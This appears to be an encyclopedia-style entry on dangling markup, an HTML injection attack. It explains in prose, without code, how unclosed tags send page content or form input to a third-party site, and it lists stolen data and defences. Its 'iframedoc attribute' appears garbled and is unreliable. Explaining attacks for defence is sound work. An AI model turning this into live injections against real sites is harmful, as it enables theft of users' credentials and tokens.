Dangling markup is a type of HTML injection attack, which exploits an unclosed tag or attribute. The aim of such an attack is to gain access to confidential data that is either contained in the code of the target web page or entered into forms on it.
Similar to cross-site scripting, this attack is used when the security policies of a site or web application prohibit script injection, but not the introduction of HTML tags.
Dangling markup attack technique
In the HTML language, tags or tag attributes are opened and closed with a specific sequence of characters. If all information required for code execution is given — but the tag or attribute is not closed — instead of throwing an error, the browser treats all the following text as part of the tag or attribute until it reaches a closing delimiter. In doing so, the browser ignores the recurrence of the opening delimiter. For example, if the page code has two opening <form> tags with different addresses for forwarding data, information entered in the form is sent to the first address. This peculiarity opens the door to attacks on sites and web applications vulnerable to tag injection.
Basically, the attack goes as follows: the attacker injects a tag or attribute into the target page and leaves it open, allowing a request (e.g., for an image) or data (e.g., form content) to be sent to a third-party site. In the case of an image, when the compromised page is loaded, the browser sends a request to the resource specified by the attacker, including all code located between the injected tag and the closing delimiter, which, before the page was compromised, closed a different tag or attribute. In the case of a form, the page sends the data to the attacker’s site as soon as the user enters it.
Tags used in dangling markup attacks
In dangling markup attacks, cybercriminals can use tags that imply or allow access to a third-party resource, such as:
- <img>, <video> and other tags with an src attribute
Data stolen using dangling markup
Depending on the functionality of the vulnerable web application, dangling markup allows attackers to get hold of the following user data:
- Message text (e-mail, instant messengers, social networks), login credentials, bank card details — whatever the user enters on the compromised page.
- CSRF session tokens generated to protect against cross-site request forgery.
- Nonce values used by security policies to determine allow-listed elements, for example a script from a particular source that is allowed to run on a page that otherwise blocks third-party scripts. A nonce attack can lead to execution of a malicious script on the target page.
- Data pulled from the user’s device using the iframedoc attribute.
Protection against dangling markup
One can reduce the chances of getting hit by a dangling markup attack by:
- Checking web applications for vulnerability to code injection, including HTML tags.
- Checking and sanitizing user input data; that is, removing unsafe and erroneous characters.
- Introducing content security policies (CSP).
- Using browsers with protection against dangling markup.